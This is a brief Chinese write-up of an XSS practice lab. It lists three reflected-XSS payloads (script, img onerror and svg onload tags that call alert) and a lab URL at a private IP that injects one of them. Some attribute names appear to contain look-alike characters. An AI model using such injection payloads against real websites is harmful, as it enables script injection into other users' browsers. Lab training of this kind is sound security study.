赞
踩
能够实现这个效果的payload通常有这些:
<script>alert(666)</script>
<img src=1 οnerrοr=alert(666)>
<svg src=1 οnlοad=alert(666)>
三个都可以尝试 这里使用的 <img src=1 οnerrοr=alert(666)> 有效
这个界面输入了payload之后,只要刷新界面就会有弹窗出现,所以可以使用。
http://192.168.114.139:83/level1.php?name=<img src=1 οnerrοr=alert(666)>
可以通关:然后在十五关输入payload
'http://192.168.114.139:83/level1.php?name=<img src=1 οnerrοr=alert(1)>'
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。